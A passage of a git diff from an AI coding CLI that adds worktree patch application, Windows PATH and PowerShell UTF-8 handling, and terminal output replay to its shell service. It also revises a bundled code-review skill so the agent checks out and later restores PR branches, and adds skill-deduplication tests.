+        worktreeGit.diff(['--binary', '--cached', base]),
+      );
+
+      if (!patch.trim()) {
+        return { success: true };
+      }
+
+      // Write the patch to a uniquely named temp file under the base dir;
+      // it is removed again in the `finally` below.
+      const patchFile = path.join(
+        this.getBaseDirForInstance(),
+        `.worktree-apply-${Date.now()}-${Math.random().toString(16).slice(2)}.patch`,
+      );
+      await fs.mkdir(path.dirname(patchFile), { recursive: true });
+      await fs.writeFile(patchFile, patch, 'utf-8');
+
+      try {
+        // When using the baseline, the target working tree already matches the
+        // patch pre-image (both have the dirty state), so a plain apply works.
+        // --3way is only needed for the merge-base fallback path where the
+        // pre-image may not match the working tree; it falls back to index
+        // blob lookup which would fail on baseline-relative patches.
+        const applyArgs = hasBaseline
+          ? ['apply', '--whitespace=nowarn', patchFile]
+          : ['apply', '--3way', '--whitespace=nowarn', patchFile];
+        await targetGit.raw(applyArgs);
+      } finally {
+        await fs.rm(patchFile, { force: true });
+      }
+
+      return { success: true };
+    } catch (error) {
+      return {
+        success: false,
+        error: `Failed to apply worktree changes: ${error instanceof Error ? error.message : 'Unknown error'}`,
+      };
+    }
+  }
+
+  /**
+   * Lists all sessions stored in the worktree base directory.
+   *
+   * A session is any sub-directory of the base dir that contains a parseable
+   * `config.json`; directories without one are skipped.
+   *
+   * @param customBaseDir - Optional custom base directory override
+   * @returns Sessions sorted newest first, or an empty array when the base
+   *   directory cannot be read.
+   */
+  static async listSessions(customBaseDir?: string): Promise<
+    Array<{
+      sessionId: string;
+      createdAt: number;
+      sourceRepoPath: string;
+      worktreeCount: number;
+    }>
+  > {
+    const baseDir = GitWorktreeService.getBaseDir(customBaseDir);
+    const sessions: Array<{
+      sessionId: string;
+      createdAt: number;
+      sourceRepoPath: string;
+      worktreeCount: number;
+    }> = [];
+
+    try {
+      const entries = await fs.readdir(baseDir, { withFileTypes: true });
+
+      for (const entry of entries) {
+        if (entry.isDirectory()) {
+          const configPath = path.join(baseDir, entry.name, 'config.json');
+          try {
+            const configContent = await fs.readFile(configPath, 'utf-8');
+            const config = JSON.parse(configContent) as SessionConfigFile;
+
+            const worktreesDir = path.join(baseDir, entry.name, WORKTREES_DIR);
+            let worktreeCount = 0;
+            try {
+              const worktreeEntries = await fs.readdir(worktreesDir);
+              worktreeCount = worktreeEntries.length;
+            } catch {
+              // Ignore if worktrees dir doesn't exist
+            }
+
+            sessions.push({
+              sessionId: entry.name,
+              createdAt: config.createdAt || Date.now(),
+              sourceRepoPath: config.sourceRepoPath || '',
+              worktreeCount,
+            });
+          } catch {
+            // Ignore sessions without valid config
+          }
+        }
+      }
+
+      return sessions.sort((a, b) => b.createdAt - a.createdAt);
+    } catch {
+      return [];
+    }
+  }
+
+  /**
+   * Finds the baseline commit in a worktree, if one exists.
+   * Returns the commit SHA, or null if not found.
+   * The lookup takes the most recent commit whose message matches
+   * BASELINE_COMMIT_MESSAGE; any git failure is treated as "not found".
+   */
+  private async resolveBaseline(
+    worktreeGit: SimpleGit,
+  ): Promise<string | null> {
+    try {
+      const sha = (
+        await worktreeGit.raw([
+          'log',
+          '--grep',
+          BASELINE_COMMIT_MESSAGE,
+          '--format=%H',
+          '-1',
+        ])
+      ).trim();
+      return sha || null;
+    } catch {
+      return null;
+    }
+  }
+
+  /** Stages all changes, runs a callback, then resets the index.
*/
+  private async withStagedChanges<T>(
+    git: SimpleGit,
+    fn: () => Promise<T>,
+  ): Promise<T> {
+    // Stage everything (including untracked files) so `--cached` diffs see
+    // the full working tree; the index is reset again even if `fn` throws.
+    await git.add(['--all']);
+    try {
+      return await fn();
+    } finally {
+      try {
+        await git.raw(['reset']);
+      } catch {
+        // Best-effort: ignore reset failures
+      }
+    }
+  }
+
+  /**
+   * Turns a display name into a string usable as directory and branch part:
+   * lower-cased, every character outside `a-z0-9-` replaced by a hyphen,
+   * hyphen runs collapsed, and leading/trailing hyphens removed.
+   * May return an empty string.
+   */
+  private sanitizeName(name: string): string {
+    // Replace invalid characters with hyphens
+    return name
+      .toLowerCase()
+      .replace(/[^a-z0-9-]/g, '-')
+      .replace(/-+/g, '-')
+      .replace(/^-|-$/g, '');
+  }
+
+  /** Returns true when `p` is accessible on disk, false otherwise. */
+  private async pathExists(p: string): Promise<boolean> {
+    try {
+      await fs.access(p);
+      return true;
+    } catch {
+      return false;
+    }
+  }
+}
diff --git a/packages/core/src/services/shellExecutionService.test.ts b/packages/core/src/services/shellExecutionService.test.ts
index 96055840f..5dae23a2a 100644
--- a/packages/core/src/services/shellExecutionService.test.ts
+++ b/packages/core/src/services/shellExecutionService.test.ts
@@ -4,15 +4,29 @@
  * SPDX-License-Identifier: Apache-2.0
  */
 
-import { vi, describe, it, expect, beforeEach, type Mock } from 'vitest';
+import {
+  vi,
+  describe,
+  it,
+  expect,
+  beforeEach,
+  afterEach,
+  type Mock,
+} from 'vitest';
 import EventEmitter from 'node:events';
 import type { Readable } from 'node:stream';
 import { type ChildProcess } from 'node:child_process';
+import pkg from '@xterm/headless';
 import type { ShellOutputEvent } from './shellExecutionService.js';
 import { ShellExecutionService } from './shellExecutionService.js';
 import type { AnsiOutput } from '../utils/terminalSerializer.js';
 
+const { Terminal } = pkg;
+
 // Hoisted Mocks
+const mockGetSystemEncoding = vi.hoisted(() =>
+  vi.fn().mockReturnValue('utf-8'),
+);
 const mockPtySpawn = vi.hoisted(() => vi.fn());
 const mockCpSpawn = vi.hoisted(() => vi.fn());
 const mockIsBinary = vi.hoisted(() => vi.fn());
@@ -64,6 +78,10 @@ vi.mock('../utils/terminalSerializer.js', () => ({
 vi.mock('../utils/shell-utils.js', () => ({
   getShellConfiguration: mockGetShellConfiguration,
 }));
+vi.mock('../utils/systemEncoding.js', () 
=> ({ + getCachedEncodingForBuffer: vi.fn().mockReturnValue('utf-8'), + getSystemEncoding: mockGetSystemEncoding, +})); const mockProcessKill = vi .spyOn(process, 'kill') @@ -77,6 +95,13 @@ const shellExecutionConfig = { disableDynamicLineTrimming: true, }; +const WINDOWS_SYSTEM_PATH = 'C:\\Windows\\System32;C:\\Shared\\Tools'; +const WINDOWS_USER_PATH = 'C:\\Users\\tester\\bin;C:\\Shared\\Tools'; +const EXPECTED_MERGED_WINDOWS_PATH = + 'C:\\Windows\\System32;C:\\Shared\\Tools;C:\\Users\\tester\\bin'; + +let originalProcessEnv: NodeJS.ProcessEnv; + const createExpectedAnsiOutput = (text: string | string[]): AnsiOutput => { const lines = Array.isArray(text) ? text : text.split('\n'); const expected: AnsiOutput = Array.from( @@ -97,6 +122,19 @@ const createExpectedAnsiOutput = (text: string | string[]): AnsiOutput => { return expected; }; +const setupConflictingPathEnv = () => { + process.env = { + ...originalProcessEnv, + PATH: WINDOWS_SYSTEM_PATH, + Path: WINDOWS_USER_PATH, + }; +}; + +const expectNormalizedWindowsPathEnv = (env: NodeJS.ProcessEnv) => { + expect(env['PATH']).toBe(EXPECTED_MERGED_WINDOWS_PATH); + expect(env['Path']).toBeUndefined(); +}; + describe('ShellExecutionService', () => { let mockPtyProcess: EventEmitter & { pid: number; @@ -119,6 +157,7 @@ describe('ShellExecutionService', () => { beforeEach(() => { vi.clearAllMocks(); + originalProcessEnv = process.env; mockIsBinary.mockReturnValue(false); mockPlatform.mockReturnValue('linux'); @@ -157,6 +196,11 @@ describe('ShellExecutionService', () => { mockPtySpawn.mockReturnValue(mockPtyProcess); }); + afterEach(() => { + process.env = originalProcessEnv; + vi.unstubAllEnvs(); + }); + // Helper function to run a standard execution simulation const simulateExecution = async ( command: string, @@ -258,6 +302,68 @@ describe('ShellExecutionService', () => { await handle.result; expect(handle.pid).toBe(12345); }); + + it('should preserve full raw output when terminal writes are backlogged', async () => { + 
vi.useFakeTimers(); + const originalWrite = Terminal.prototype.write; + const delayedWrite = vi + .spyOn(Terminal.prototype, 'write') + .mockImplementation(function ( + this: pkg.Terminal, + data: string | Uint8Array, + callback?: () => void, + ) { + setTimeout(() => { + originalWrite.call(this, data, callback); + }, 10); + }); + + try { + const abortController = new AbortController(); + const handle = await ShellExecutionService.execute( + 'fast-output', + '/test/dir', + onOutputEventMock, + abortController.signal, + true, + shellExecutionConfig, + ); + + const onData = mockPtyProcess.onData.mock.calls[0][0] as ( + data: string, + ) => void; + for (let i = 1; i <= 500; i++) { + onData(`Line ${String(i).padStart(4, '0')}\n`); + } + + const resultPromise = handle.result; + mockPtyProcess.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + + await vi.advanceTimersByTimeAsync(250); + const result = await resultPromise; + + const lines = result.output.split('\n'); + expect(lines).toHaveLength(500); + expect(lines[0]).toBe('Line 0001'); + expect(lines[499]).toBe('Line 0500'); + } finally { + delayedWrite.mockRestore(); + vi.clearAllTimers(); + vi.useRealTimers(); + } + }); + + it('should collapse carriage-return progress updates in final output', async () => { + const { result } = await simulateExecution('progress-output', (pty) => { + pty.onData.mock.calls[0][0]('Compressing objects: 14% (1/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 28% (2/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 42% (3/7)\r'); + pty.onData.mock.calls[0][0]('Compressing objects: 100% (7/7), done.\n'); + pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + }); + + expect(result.output).toBe('Compressing objects: 100% (7/7), done.'); + }); }); describe('pty interaction', () => { @@ -272,17 +378,28 @@ describe('ShellExecutionService', () => { it('should write to the pty and trigger a render', async () => { vi.useFakeTimers(); - await 
simulateExecution('interactive-app', (pty) => { - ShellExecutionService.writeToPty(pty.pid!, 'input'); - pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); - }); + try { + const abortController = new AbortController(); + const handle = await ShellExecutionService.execute( + 'interactive-app', + '/test/dir', + onOutputEventMock, + abortController.signal, + true, + shellExecutionConfig, + ); - expect(mockPtyProcess.write).toHaveBeenCalledWith('input'); - // Use fake timers to check for the delayed render - await vi.advanceTimersByTimeAsync(17); - // The render will cause an output event - expect(onOutputEventMock).toHaveBeenCalled(); - vi.useRealTimers(); + ShellExecutionService.writeToPty(handle.pid!, 'input'); + mockPtyProcess.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }); + + await vi.runAllTimersAsync(); + await handle.result; + + expect(mockPtyProcess.write).toHaveBeenCalledWith('input'); + expect(onOutputEventMock).toHaveBeenCalled(); + } finally { + vi.useRealTimers(); + } }); it('should resize the pty and the headless terminal', async () => { @@ -441,7 +558,7 @@ describe('ShellExecutionService', () => { }); }); - it('should use PowerShell on Windows with array args', async () => { + it('should use PowerShell on Windows with array args and UTF-8 prefix', async () => { mockPlatform.mockReturnValue('win32'); mockGetShellConfiguration.mockReturnValue({ executable: 'powershell.exe', @@ -452,9 +569,14 @@ describe('ShellExecutionService', () => { pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }), ); + // PowerShell commands on Windows are prefixed with UTF-8 output encoding expect(mockPtySpawn).toHaveBeenCalledWith( 'powershell.exe', - ['-NoProfile', '-Command', 'Test-Path "C:\\Temp\\"'], + [ + '-NoProfile', + '-Command', + '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;Test-Path "C:\\Temp\\"', + ], expect.any(Object), ); mockGetShellConfiguration.mockReturnValue({ @@ -464,6 +586,18 @@ describe('ShellExecutionService', () => { }); 
}); + it('should normalize PATH-like env keys on Windows for pty execution', async () => { + mockPlatform.mockReturnValue('win32'); + setupConflictingPathEnv(); + + await simulateExecution('dir', (pty) => + pty.onExit.mock.calls[0][0]({ exitCode: 0, signal: null }), + ); + + const spawnOptions = mockPtySpawn.mock.calls[0][2]; + expectNormalizedWindowsPathEnv(spawnOptions.env); + }); + it('should use bash on Linux', async () => { mockPlatform.mockReturnValue('linux'); await simulateExecution('ls "foo bar"', (pty) => @@ -571,6 +705,7 @@ describe('ShellExecutionService child_process fallback', () => { beforeEach(() => { vi.clearAllMocks(); + originalProcessEnv = process.env; mockIsBinary.mockReturnValue(false); mockPlatform.mockReturnValue('linux'); @@ -592,6 +727,11 @@ describe('ShellExecutionService child_process fallback', () => { mockCpSpawn.mockReturnValue(mockChildProcess); }); + afterEach(() => { + process.env = originalProcessEnv; + vi.unstubAllEnvs(); + }); + // Helper function to run a standard execution simulation const simulateExecution = async ( command: string, @@ -890,7 +1030,7 @@ describe('ShellExecutionService child_process fallback', () => { }); }); - it('should use PowerShell without windowsVerbatimArguments on Windows', async () => { + it('should use PowerShell with UTF-8 prefix without windowsVerbatimArguments on Windows', async () => { mockPlatform.mockReturnValue('win32'); mockGetShellConfiguration.mockReturnValue({ executable: 'powershell.exe', @@ -901,9 +1041,14 @@ describe('ShellExecutionService child_process fallback', () => { cp.emit('exit', 0, null), ); + // PowerShell commands on Windows are prefixed with UTF-8 output encoding expect(mockCpSpawn).toHaveBeenCalledWith( 'powershell.exe', - ['-NoProfile', '-Command', 'Test-Path "C:\\Temp\\"'], + [ + '-NoProfile', + '-Command', + '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;Test-Path "C:\\Temp\\"', + ], expect.objectContaining({ detached: false, windowsHide: true, @@ -917,6 
+1062,16 @@ describe('ShellExecutionService child_process fallback', () => { }); }); + it('should normalize PATH-like env keys on Windows for child_process fallback', async () => { + mockPlatform.mockReturnValue('win32'); + setupConflictingPathEnv(); + + await simulateExecution('dir', (cp) => cp.emit('exit', 0, null)); + + const spawnOptions = mockCpSpawn.mock.calls[0][2]; + expectNormalizedWindowsPathEnv(spawnOptions.env); + }); + it('should use bash and detached process group on Linux', async () => { mockPlatform.mockReturnValue('linux'); await simulateExecution('ls "foo bar"', (cp) => cp.emit('exit', 0, null)); diff --git a/packages/core/src/services/shellExecutionService.ts b/packages/core/src/services/shellExecutionService.ts index d43d0f190..e943275bd 100644 --- a/packages/core/src/services/shellExecutionService.ts +++ b/packages/core/src/services/shellExecutionService.ts @@ -22,6 +22,103 @@ import { const { Terminal } = pkg; const SIGKILL_TIMEOUT_MS = 200; +const WINDOWS_PATH_DELIMITER = ';'; +let cachedWindowsPathFingerprint: string | undefined; +let cachedMergedWindowsPath: string | undefined; + +function mergeWindowsPathValues( + env: NodeJS.ProcessEnv, + pathKeys: string[], +): string | undefined { + const mergedEntries: string[] = []; + const seenEntries = new Set(); + + for (const key of pathKeys) { + const value = env[key]; + if (value === undefined) { + continue; + } + + for (const entry of value.split(WINDOWS_PATH_DELIMITER)) { + if (seenEntries.has(entry)) { + continue; + } + seenEntries.add(entry); + mergedEntries.push(entry); + } + } + + return mergedEntries.length > 0 + ? mergedEntries.join(WINDOWS_PATH_DELIMITER) + : undefined; +} + +function getWindowsPathFingerprint( + env: NodeJS.ProcessEnv, + pathKeys: string[], +): string { + return pathKeys.map((key) => `${key}=${env[key] ?? 
''}`).join('\0'); +} + +function normalizePathEnvForWindows(env: NodeJS.ProcessEnv): NodeJS.ProcessEnv { + if (os.platform() !== 'win32') { + return env; + } + + const normalized: NodeJS.ProcessEnv = { ...env }; + const pathKeys = Object.keys(normalized).filter( + (key) => key.toLowerCase() === 'path', + ); + + if (pathKeys.length === 0) { + return normalized; + } + + const orderedPathKeys = [...pathKeys].sort((left, right) => { + if (left === 'PATH') { + return -1; + } + if (right === 'PATH') { + return 1; + } + return left.localeCompare(right); + }); + + const fingerprint = getWindowsPathFingerprint(normalized, orderedPathKeys); + const canonicalValue = + fingerprint === cachedWindowsPathFingerprint + ? cachedMergedWindowsPath + : mergeWindowsPathValues(normalized, orderedPathKeys); + + if (fingerprint !== cachedWindowsPathFingerprint) { + cachedWindowsPathFingerprint = fingerprint; + cachedMergedWindowsPath = canonicalValue; + } + + for (const key of pathKeys) { + if (key !== 'PATH') { + delete normalized[key]; + } + } + + if (canonicalValue !== undefined) { + normalized['PATH'] = canonicalValue; + } + + return normalized; +} + +/** + * On Windows with PowerShell, prefix the command with a statement that forces + * UTF-8 output encoding so that CJK and other non-ASCII characters are emitted + * as UTF-8 regardless of the system codepage. + */ +function applyPowerShellUtf8Prefix(command: string, shell: string): string { + if (os.platform() === 'win32' && shell === 'powershell') { + return '[Console]::OutputEncoding=[System.Text.Encoding]::UTF8;' + command; + } + return command; +} /** A structured result from a shell command execution. */ export interface ShellExecutionResult { @@ -93,12 +190,32 @@ const getFullBufferText = (terminal: pkg.Terminal): string => { const lines: string[] = []; for (let i = 0; i < buffer.length; i++) { const line = buffer.getLine(i); - const lineContent = line ? line.translateToString() : ''; + const lineContent = line ? 
line.translateToString(true) : ''; lines.push(lineContent); } return lines.join('\n').trimEnd(); }; +const replayTerminalOutput = async ( + output: string, + cols: number, + rows: number, +): Promise => { + const replayTerminal = new Terminal({ + allowProposedApi: true, + cols, + rows, + scrollback: 10000, + convertEol: true, + }); + + await new Promise((resolve) => { + replayTerminal.write(output, () => resolve()); + }); + + return getFullBufferText(replayTerminal); +}; + interface ProcessCleanupStrategy { killPty(pid: number, pty: ActivePty): void; killChildProcesses(pids: Set): void; @@ -225,6 +342,7 @@ export class ShellExecutionService { try { const isWindows = os.platform() === 'win32'; const { executable, argsPrefix, shell } = getShellConfiguration(); + commandToExecute = applyPowerShellUtf8Prefix(commandToExecute, shell); const shellArgs = [...argsPrefix, commandToExecute]; // Note: CodeQL flags this as js/shell-command-injection-from-environment. @@ -241,7 +359,7 @@ export class ShellExecutionService { detached: !isWindows, windowsHide: isWindows, env: { - ...process.env, + ...normalizePathEnvForWindows(process.env), QWEN_CODE: '1', TERM: 'xterm-256color', PAGER: 'cat', @@ -424,6 +542,8 @@ export class ShellExecutionService { const cols = shellExecutionConfig.terminalWidth ?? 80; const rows = shellExecutionConfig.terminalHeight ?? 30; const { executable, argsPrefix, shell } = getShellConfiguration(); + commandToExecute = applyPowerShellUtf8Prefix(commandToExecute, shell); + // On Windows with cmd.exe, pass args as a single string instead of // an array. node-pty's argsToCommandLine re-quotes array elements // that contain spaces, which mangles user-provided quoted arguments @@ -445,7 +565,7 @@ export class ShellExecutionService { cols, rows, env: { - ...process.env, + ...normalizePathEnvForWindows(process.env), QWEN_CODE: '1', TERM: 'xterm-256color', PAGER: shellExecutionConfig.pager ?? 
'cat', @@ -474,6 +594,7 @@ export class ShellExecutionService { let isStreamingRawContent = true; const MAX_SNIFF_SIZE = 4096; let sniffedBytes = 0; + let totalBytesReceived = 0; let isWriting = false; let hasStartedOutput = false; let renderTimeout: NodeJS.Timeout | null = null; @@ -588,21 +709,31 @@ export class ShellExecutionService { } }); + const ensureDecoder = (data: Buffer) => { + if (decoder) { + return; + } + + const encoding = getCachedEncodingForBuffer(data); + try { + decoder = new TextDecoder(encoding); + } catch { + decoder = new TextDecoder('utf-8'); + } + }; + const handleOutput = (data: Buffer) => { + // Capture raw output immediately. Rendering the headless terminal is + // slower than appending a Buffer, and rapid PTY output can otherwise + // overrun the render queue before finalize() races on exit. + ensureDecoder(data); + outputChunks.push(data); + totalBytesReceived += data.length; + const bytesReceived = totalBytesReceived; + processingChain = processingChain.then( () => new Promise((resolve) => { - if (!decoder) { - const encoding = getCachedEncodingForBuffer(data); - try { - decoder = new TextDecoder(encoding); - } catch { - decoder = new TextDecoder('utf-8'); - } - } - - outputChunks.push(data); - if (isStreamingRawContent && sniffedBytes < MAX_SNIFF_SIZE) { const sniffBuffer = Buffer.concat(outputChunks.slice(0, 20)); sniffedBytes = sniffBuffer.length; @@ -614,7 +745,7 @@ export class ShellExecutionService { } if (isStreamingRawContent) { - const decodedChunk = decoder.decode(data, { stream: true }); + const decodedChunk = decoder!.decode(data, { stream: true }); isWriting = true; headlessTerminal.write(decodedChunk, () => { render(); @@ -622,13 +753,9 @@ export class ShellExecutionService { resolve(); }); } else { - const totalBytes = outputChunks.reduce( - (sum, chunk) => sum + chunk.length, - 0, - ); onOutputEvent({ type: 'binary_progress', - bytesReceived: totalBytes, + bytesReceived, }); resolve(); } @@ -647,13 +774,40 @@ export 
class ShellExecutionService { abortSignal.removeEventListener('abort', abortHandler); this.activePtys.delete(ptyProcess.pid); - const finalize = () => { + const finalize = async () => { render(true); const finalBuffer = Buffer.concat(outputChunks); + let fullOutput = ''; + + try { + if (isStreamingRawContent) { + // Re-decode the full buffer with proper encoding detection. + // The streaming decoder used the first-chunk heuristic which + // can misdetect when early output is ASCII-only but later + // output is in a different encoding (e.g. GBK). + const finalEncoding = getCachedEncodingForBuffer(finalBuffer); + const decodedOutput = new TextDecoder(finalEncoding).decode( + finalBuffer, + ); + fullOutput = await replayTerminalOutput( + decodedOutput, + cols, + rows, + ); + } else { + fullOutput = getFullBufferText(headlessTerminal); + } + } catch { + try { + fullOutput = getFullBufferText(headlessTerminal); + } catch { + // Ignore fallback rendering errors and resolve with empty text. + } + } resolve({ rawOutput: finalBuffer, - output: getFullBufferText(headlessTerminal), + output: fullOutput, exitCode, signal: signal ?? null, error, @@ -665,16 +819,20 @@ export class ShellExecutionService { }); }; - // Always try to flush pending terminal writes before - // finalizing so result.output is as complete as possible. - // Race against abort or a short timeout to avoid hanging. - const processingComplete = processingChain.then(() => 'processed'); - const deadline = new Promise<'timeout'>((res) => - setTimeout(() => res('timeout'), SIGKILL_TIMEOUT_MS), + // Give any last onData callbacks a chance to run before finalizing. + // onExit can arrive slightly before late PTY data is processed. 
+ const flushChain = () => processingChain.then(() => {}); + const deadline = new Promise((res) => + setTimeout(res, SIGKILL_TIMEOUT_MS), ); + const drain = () => + new Promise((res) => setImmediate(res)).then(flushChain); - void Promise.race([processingComplete, deadline]).then(() => { - finalize(); + void Promise.race([ + flushChain().then(drain).then(drain), + deadline, + ]).then(() => { + void finalize(); }); }, ); diff --git a/packages/core/src/skills/bundled/review/SKILL.md b/packages/core/src/skills/bundled/review/SKILL.md index 14e5f27e6..957031c7a 100644 --- a/packages/core/src/skills/bundled/review/SKILL.md +++ b/packages/core/src/skills/bundled/review/SKILL.md @@ -15,15 +15,16 @@ You are an expert code reviewer. Your job is to review code changes and provide ## Step 1: Determine what to review -Based on the arguments provided: +Your goal here is to understand the scope of changes so you can dispatch agents effectively in Step 2. Based on the arguments provided: - **No arguments**: Review local uncommitted changes - Run `git diff` and `git diff --staged` to get all changes - If both diffs are empty, inform the user there are no changes to review and stop here — do not proceed to the review agents - **PR number or URL** (e.g., `123` or `https://github.com/.../pull/123`): - - Run `gh pr view ` to get PR details - - Run `gh pr diff ` to get the diff + - Save the current branch name, stash any local changes (`git stash --include-untracked`), then `gh pr checkout ` + - Run `gh pr view ` and save the output (title, description, base branch, etc.) 
to a temp file (e.g., `/tmp/pr-review-context.md`) so agents can read it without you repeating it in each prompt + - Note the base branch (e.g., `main`) — agents will use `git diff ...HEAD` to get the diff and can read files directly - **File path** (e.g., `src/foo.ts`): - Run `git diff HEAD -- ` to get recent changes @@ -33,6 +34,8 @@ Based on the arguments provided: Launch **four parallel review agents** to analyze the changes from different angles. Each agent should focus exclusively on its dimension. +**IMPORTANT**: Do NOT paste the full diff into each agent's prompt — this duplicates it 4x. Instead, give each agent the command to obtain the diff, a concise summary of what the changes are about, and its review focus. Each agent can read files and search the codebase on its own. + ### Agent 1: Correctness & Security Focus areas: @@ -77,9 +80,11 @@ Focus areas: - Unexpected side effects or hidden coupling - Anything else that looks off — trust your instincts -## Step 3: Aggregate and present findings +## Step 3: Restore environment and present findings -Combine results from all four agents into a single, well-organized review. Use this format: +If you checked out a PR branch in Step 1, restore the original state first: check out the original branch, `git stash pop` if changes were stashed, and remove the temp file. + +Then combine results from all four agents into a single, well-organized review. Use this format: ### Summary diff --git a/packages/core/src/skills/skill-manager.test.ts b/packages/core/src/skills/skill-manager.test.ts index 272d3001d..639234577 100644 --- a/packages/core/src/skills/skill-manager.test.ts +++ b/packages/core/src/skills/skill-manager.test.ts @@ -73,6 +73,14 @@ describe('SkillManager', () => { if (yamlString.includes('name: regular-skill')) { return { name: 'regular-skill', description: 'A regular skill' }; } + if (yamlString.includes('name: shared-skill')) { + const desc = yamlString.includes('From qwen dir') + ? 
'From qwen dir' + : yamlString.includes('From agent dir') + ? 'From agent dir' + : 'A shared skill'; + return { name: 'shared-skill', description: desc }; + } if (!yamlString.includes('name:')) { return { description: 'A test skill' }; // Missing name case } @@ -391,42 +399,61 @@ You are a helpful assistant. describe('listSkills', () => { beforeEach(() => { - // Mock directory listing for skills directories (with Dirent objects) - vi.mocked(fs.readdir) - .mockResolvedValueOnce([ - { - name: 'skill1', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'skill2', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'not-a-dir.txt', - isDirectory: () => false, - isFile: () => true, - isSymbolicLink: () => false, - }, - ] as unknown as Awaited>) - .mockResolvedValueOnce([ - { - name: 'skill3', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - { - name: 'skill1', - isDirectory: () => true, - isFile: () => false, - isSymbolicLink: () => false, - }, - ] as unknown as Awaited>); + // Mock directory listing based on path to handle multiple base dirs per level. + // Use path.join to construct expected paths so separators match on all platforms. 
+ const projectQwenSkillsDir = path.join( + '/test/project', + '.qwen', + 'skills', + ); + const userQwenSkillsDir = path.join('/home/user', '.qwen', 'skills'); + + // eslint-disable-next-line @typescript-eslint/no-explicit-any + vi.mocked(fs.readdir).mockImplementation((dirPath: any) => { + const pathStr = String(dirPath); + if (pathStr === projectQwenSkillsDir) { + return Promise.resolve([ + { + name: 'skill1', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'skill2', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'not-a-dir.txt', + isDirectory: () => false, + isFile: () => true, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + if (pathStr === userQwenSkillsDir) { + return Promise.resolve([ + { + name: 'skill3', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + { + name: 'skill1', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + // Other provider dirs (.agent, .cursor, .codex, .claude) return empty + return Promise.resolve( + [] as unknown as Awaited>, + ); + }); vi.mocked(fs.access).mockResolvedValue(undefined); @@ -483,6 +510,66 @@ Skill 3 content`); expect(projectSkills.every((s) => s.level === 'project')).toBe(true); }); + it('should deduplicate same-name skills across provider dirs within a level', async () => { + // Override readdir to return the same skill name from both .qwen and .agent dirs + vi.mocked(fs.readdir).mockReset(); + const projectQwenDir = path.join('/test/project', '.qwen', 'skills'); + const projectAgentDir = path.join('/test/project', '.agent', 'skills'); + + // eslint-disable-next-line @typescript-eslint/no-explicit-any + vi.mocked(fs.readdir).mockImplementation((dirPath: any) => { + const pathStr = String(dirPath); + if (pathStr === projectQwenDir) { + return Promise.resolve([ + { + name: 'shared-skill', + 
isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + if (pathStr === projectAgentDir) { + return Promise.resolve([ + { + name: 'shared-skill', + isDirectory: () => true, + isFile: () => false, + isSymbolicLink: () => false, + }, + ] as unknown as Awaited>); + } + return Promise.resolve( + [] as unknown as Awaited>, + ); + }); + + vi.mocked(fs.readFile).mockImplementation((filePath) => { + const pathStr = String(filePath); + if (pathStr.includes('.qwen') && pathStr.includes('shared-skill')) { + return Promise.resolve( + `---\nname: shared-skill\ndescription: From qwen dir\n---\nQwen content`, + ); + } + if (pathStr.includes('.agent') && pathStr.includes('shared-skill')) { + return Promise.resolve( + `---\nname: shared-skill\ndescription: From agent dir\n---\nAgent content`, + ); + } + return Promise.reject(new Error('File not found')); + }); + + const skills = await manager.listSkills({ + level: 'project', + force: true, + }); + + // Only one instance should remain, from .qwen (first in PROVIDER_CONFIG_DIRS) + expect(skills).toHaveLength(1); + expect(skills[0].name).toBe('shared-skill'); + expect(skills[0].description).toBe('From qwen dir'); + }); + it('should handle empty directories', async () => { vi.mocked(fs.readdir).mockReset(); vi.mocked(fs.readdir).mockResolvedValue( @@ -504,27 +591,33 @@ Skill 3 content`); }); }); - describe('getSkillsBaseDir', () => { - it('should return project-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('project'); + describe('getSkillsBaseDirs', () => { + it('should return all project-level base dirs', () => { + const baseDirs = manager.getSkillsBaseDirs('project'); - expect(baseDir).toBe(path.join('/test/project', '.qwen', 'skills')); + expect(baseDirs).toHaveLength(2); + expect(baseDirs).toContain(path.join('/test/project', '.qwen', 'skills')); + expect(baseDirs).toContain( + path.join('/test/project', '.agent', 'skills'), + ); }); - it('should 
return user-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('user'); + it('should return all user-level base dirs', () => { + const baseDirs = manager.getSkillsBaseDirs('user'); - expect(baseDir).toBe(path.join('/home/user', '.qwen', 'skills')); + expect(baseDirs).toHaveLength(2); + expect(baseDirs).toContain(path.join('/home/user', '.qwen', 'skills')); + expect(baseDirs).toContain(path.join('/home/user', '.agent', 'skills')); }); it('should return bundled-level base dir', () => { - const baseDir = manager.getSkillsBaseDir('bundled'); + const baseDirs = manager.getSkillsBaseDirs('bundled'); - expect(baseDir).toMatch(/skills[/\\]bundled$/); + expect(baseDirs[0]).toMatch(/skills[/\\]bundled$/); }); it('should throw for extension level', () => { - expect(() => manager.getSkillsBaseDir('extension')).toThrow( + expect(() => manager.getSkillsBaseDirs('extension')).toThrow( 'Extension skills do not have a base directory', ); }); diff --git a/packages/core/src/skills/skill-manager.ts b/packages/core/src/skills/skill-manager.ts index b6636a627..fbeb18b8d 100644 --- a/packages/core/src/skills/skill-manager.ts +++ b/packages/core/src/skills/skill-manager.ts @@ -22,6 +22,7 @@ import type { Config } from '../config/config.js'; import { validateConfig } from './skill-load.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import { normalizeContent } from '../utils/textUtils.js'; +import { SKILL_PROVIDER_CONFIG_DIRS } from '../config/storage.js'; const debugLogger = 